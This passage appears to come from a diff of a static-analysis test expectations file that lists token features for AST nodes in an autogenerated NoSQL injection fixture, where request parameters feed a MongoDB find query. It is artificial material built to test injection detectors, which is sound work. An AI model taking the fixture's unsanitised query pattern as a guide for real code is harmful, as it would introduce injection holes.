enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:21 | req.param | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:17:90:21 | param | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:17:90:21 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:17:90:21 | param | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:17:90:21 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:17:90:21 | param | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | MongoClient | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | MongoClient | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | this | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | this | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | this | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:0 | this | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:1 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:1 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:1 | query | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:1 | query | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:92:1 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | 'arguments' object of function useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | 'arguments' object of function useParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | 'arguments' object of function useParams | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | 'arguments' object of function useParams | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | 'arguments' object of function useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | exceptional return of function useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | exceptional return of function useParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | exceptional return of function useParams | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | exceptional return of function useParams | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | exceptional return of function useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | functio ... });\\n} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | functio ... });\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | functio ... });\\n} | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | return of function useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | return of function useParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | return of function useParams | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | return of function useParams | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:1:100:1 | return of function useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:10:92:18 | useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:10:92:18 | useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:10:92:18 | useParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:10:92:18 | useParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:10:92:18 | useParams | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:10:92:18 | useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:10:92:18 | useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:92:20:92:25 | params | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:11 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query = ... ms.id } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query = ... ms.id } | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query = ... ms.id } | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query = ... ms.id } | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:7:93:31 | query = ... ms.id } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:15:93:31 | { id: params.id } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:15:93:31 | { id: params.id } | contextSurroundingFunctionParameters | (params) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:15:93:31 | { id: params.id } | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:15:93:31 | { id: params.id } | enclosingFunctionName | useParams | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:15:93:31 | { id: params.id } | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:18 | id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:18 | id | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:18 | id | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:18 | id | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:18 | id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:17:93:29 | id: params.id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:26 | params | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:26 | params | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:26 | params | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:26 | params | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:26 | params | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:29 | params.id | assignedToPropName | id | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:29 | params.id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:29 | params.id | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:29 | params.id | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:29 | params.id | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:21:93:29 | params.id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:28:93:29 | id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:28:93:29 | id | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:28:93:29 | id | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:28:93:29 | id | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:93:28:93:29 | id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:13 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:13 | MongoClient | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:13 | MongoClient | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:13 | MongoClient | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:13 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:21 | MongoClient.connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:21 | MongoClient.connect | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:21 | MongoClient.connect | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:21 | MongoClient.connect | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:94:21 | MongoClient.connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | MongoCl ... );\\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | MongoCl ... );\\n }) | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | MongoCl ... );\\n }) | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | MongoCl ... );\\n }) | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | MongoCl ... );\\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | exceptional return of MongoCl ... );\\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | exceptional return of MongoCl ... );\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | exceptional return of MongoCl ... );\\n }) | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | exceptional return of MongoCl ... );\\n }) | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:3:99:4 | exceptional return of MongoCl ... );\\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:15:94:21 | connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:15:94:21 | connect | contextSurroundingFunctionParameters | (params) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:15:94:21 | connect | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:15:94:21 | connect | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:15:94:21 | connect | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:23:94:54 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:23:94:54 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:23:94:54 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -1908,6 +10241,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:23:94:54 | 'mongod ... 7/test' | enclosingFunctionName | useParams | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:23:94:54 | 'mongod ... 7/test' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:23:94:54 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:94:56 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:94:56 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:94:56 | query | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:94:56 | query | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:94:56 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | 'arguments' object of anonymous function | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | 'arguments' object of anonymous function | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | (err, d ... y);\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | (err, d ... y);\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | (err, d ... y);\\n } | calleeImports | mongodb | @@ -1917,6 +10260,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | (err, d ... y);\\n } | enclosingFunctionName | useParams | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | (err, d ... y);\\n } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | (err, d ... y);\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | exceptional return of anonymous function | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | exceptional return of anonymous function | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | return of anonymous function | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | return of anonymous function | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:57:99:3 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:58:94:60 | err | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:58:94:60 | err | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:58:94:60 | err | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:58:94:60 | err | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:58:94:60 | err | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:94:63:94:64 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:11 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:11 | doc | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:11 | doc | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:11 | doc | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:11 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc = d ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc = d ... ('doc') | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc = d ... ('doc') | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:9:95:34 | doc = d ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:16 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:16 | db | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:16 | db | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:16 | db | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:16 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:27 | db.collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:27 | db.collection | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:27 | db.collection | 